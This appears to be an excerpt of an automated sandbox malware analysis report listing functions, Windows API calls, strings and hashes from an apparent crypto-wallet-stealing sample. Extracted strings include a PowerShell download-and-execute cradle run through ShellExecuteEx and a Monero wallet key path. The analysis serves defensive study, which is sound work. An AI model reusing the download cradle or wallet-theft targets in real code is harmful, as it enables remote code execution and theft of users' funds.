                    • Part of subcall function 00148D90: GetFileAttributesA.KERNEL32(00000000,?,00131B54,?,?,0015564C,?,?,00150E1F), ref: 00148D9F
                    • Part of subcall function 00144570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00144580
                    • Part of subcall function 00144570: RtlAllocateHeap.NTDLL(00000000), ref: 00144587
                    • Part of subcall function 00144570: wsprintfA.USER32 ref: 001445A6
                    • Part of subcall function 00144570: FindFirstFileA.KERNEL32(?,?), ref: 001445BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: bfe42bd206f77bf276c83a56f881a97f8b262a017f7078863db74258f4c7503b
                  • Instruction ID: c859e87e9977a5ca7744b53285ddf7b2ef7f4b8e6743fb23ef8370ae4f5cb1e7
                  • Opcode Fuzzy Hash: bfe42bd206f77bf276c83a56f881a97f8b262a017f7078863db74258f4c7503b
                  • Instruction Fuzzy Hash: 8D3172B2900218A7CB21FBB0DC85EED737CABA8704F404589B35996091EF7497C9CB96
                  Function 00142C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00142D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00142CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00142D04
                  • <, xrefs: 00142D39
                  • ')", xrefs: 00142CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 8e620fc38ab498b6c6babe4bcb0f2d0917dbe65299030acc29ae73e4ae77617d
                  • Instruction ID: 18b240f3758529fa4d61049390e52162538bdb68fce786d6db6974be2eaac4e0
                  • Opcode Fuzzy Hash: 8e620fc38ab498b6c6babe4bcb0f2d0917dbe65299030acc29ae73e4ae77617d
                  • Instruction Fuzzy Hash: 6441DF71C902089AEB15FFA0C892BEDB774EF24305F914119F416AB1A2DF746A4ACF91
                  Function 00139E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00139F41
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 7eb90e9b89763d384a29b534993632f024e2f672e4a943c763799e1dce5e5b7e
                  • Instruction ID: 7038bf2bfc7427abaeacf13bc583d734c8a1148dbbfdd7456d2e4aa48f6c577b
                  • Opcode Fuzzy Hash: 7eb90e9b89763d384a29b534993632f024e2f672e4a943c763799e1dce5e5b7e
                  • Instruction Fuzzy Hash: E1617171A40208EFDB28EFA4CC96FED7775AF54301F418018F90A9F1A1EB746A06CB52
                  Function 001440B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0102D398,00000000,00020119,?), ref: 001440F4
                  • RegQueryValueExA.ADVAPI32(?,0102DF38,00000000,00000000,00000000,000000FF), ref: 00144118
                  • RegCloseKey.ADVAPI32(?), ref: 00144122
                  • lstrcat.KERNEL32(?,00000000), ref: 00144147
                  • lstrcat.KERNEL32(?,0102DF50), ref: 0014415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 29e2d75b7fd9bf0da058010bf59d33df303e5c3aef530fe40bc2d0cb0058da50
                  • Instruction ID: a734ed2fd1ee1a097a9f475d120b8f46c851f932e21480fcf2a9de2c282f1892
                  • Opcode Fuzzy Hash: 29e2d75b7fd9bf0da058010bf59d33df303e5c3aef530fe40bc2d0cb0058da50
                  • Instruction Fuzzy Hash: 424197B6900108BBDB25FBA0DC46FEE737DAB98300F404558B61996191EB755BC88B92
                  Function 00147E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0101B7A8,00000000,00020119,?), ref: 00147E5E
                  • RegQueryValueExA.ADVAPI32(?,0102D338,00000000,00000000,000000FF,000000FF), ref: 00147E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00147E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: a256ca9c445b9d92c0f60aadcdce737f22ad2a5e07d905a09913ef7577de9ee9
                  • Instruction ID: f0e75943dcaf5653ea6c23b2695d7ad4add3c6cb8df22fd049d33716689e563f
                  • Opcode Fuzzy Hash: a256ca9c445b9d92c0f60aadcdce737f22ad2a5e07d905a09913ef7577de9ee9
                  • Instruction Fuzzy Hash: 4A118CB1A44605EBD725CFD4DD49FBFBBBCEB48B01F104259FA19A7290D77458008BA2
                  Function 00149260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(0102DC50,?,?,?,0014140C,?,0102DC50,00000000), ref: 0014926C
                  • lstrcpyn.KERNEL32(0037AB88,0102DC50,0102DC50,?,0014140C,?,0102DC50), ref: 00149290
                  • lstrlen.KERNEL32(?,?,0014140C,?,0102DC50), ref: 001492A7
                  • wsprintfA.USER32 ref: 001492C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: ec9cf47b7f0e7f9b582fabc4dbcdfb0279ecf6b1f179e095f53319d5a06e1f6c
                  • Instruction ID: 1e967eae37967a52b8ee682f1af7dd57be55cc5b57ff69056a217dddaf57ba53
                  • Opcode Fuzzy Hash: ec9cf47b7f0e7f9b582fabc4dbcdfb0279ecf6b1f179e095f53319d5a06e1f6c
                  • Instruction Fuzzy Hash: 5201E975500508FFCB15DFE8C984EAE7BB9EB88351F108148F9098B200C675AA40DB91
                  Function 001312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001312B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001312BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001312D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001312F5
                  • RegCloseKey.ADVAPI32(?), ref: 001312FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 4fb816a8615855df71086d984ce73cd5795c23a6fc1586832aec5b32eb3ab765
                  • Instruction ID: 4a8a138109d914b3eaf4ae07531a1e05cde4aca994adeb4971589c7f8d2ac90e
                  • Opcode Fuzzy Hash: 4fb816a8615855df71086d984ce73cd5795c23a6fc1586832aec5b32eb3ab765
                  • Instruction Fuzzy Hash: 3F0131B9A40208BBDB14DFE0DC49FAEBBBCEB88701F108159FA0997280D6709A418F51
                  Function 0014C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: f9113e336b9cd486864e56d0255b144a30f1cfb047453740d21c0bb8c2ca284a
                  • Instruction ID: 8d69854233bbaf026fee0aaf42c58cd812b80edf92ba61a24234baec645c1ab9
                  • Opcode Fuzzy Hash: f9113e336b9cd486864e56d0255b144a30f1cfb047453740d21c0bb8c2ca284a
                  • Instruction Fuzzy Hash: 3941E77150179CAEDB258B24CC94FFBBBE8AF45708F1444E8E98A86192D3719A45CFA0
                  Function 00146630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00146663
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00146726
                  • ExitProcess.KERNEL32 ref: 00146755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 80919e1c4e1c984cd21e60634b3fc8f1f32bda11f16e400b45cf924ff2dc3bea
                  • Instruction ID: bf5de7e6702b7207384180e3ff25cf2055e89311a7a096dd3e39a374486d69ea
                  • Opcode Fuzzy Hash: 80919e1c4e1c984cd21e60634b3fc8f1f32bda11f16e400b45cf924ff2dc3bea
                  • Instruction Fuzzy Hash: 783130B1C41218ABDB15EB90DC91FDD777CAF54300F804199F209661A1DF746B89CF56
                  Function 001487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00150E28,00000000,?), ref: 0014882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148836
                  • wsprintfA.USER32 ref: 00148850
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 77e3dab9dcbe115983e122e35b03b407348abf8123a5fe80a23f9c60546845e9
                  • Instruction ID: 31b6629b70f01d60b4855ae8c880609595a10628ad41cb290290c22ec4429c8a
                  • Opcode Fuzzy Hash: 77e3dab9dcbe115983e122e35b03b407348abf8123a5fe80a23f9c60546845e9
                  • Instruction Fuzzy Hash: DD2160B1A40604BFDB14DFD4DD45FAEBBB8FB48701F104159F609A7290C77999008BA2
                  Function 00148D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0014951E,00000000), ref: 00148D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148D62
                  • wsprintfW.USER32 ref: 00148D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
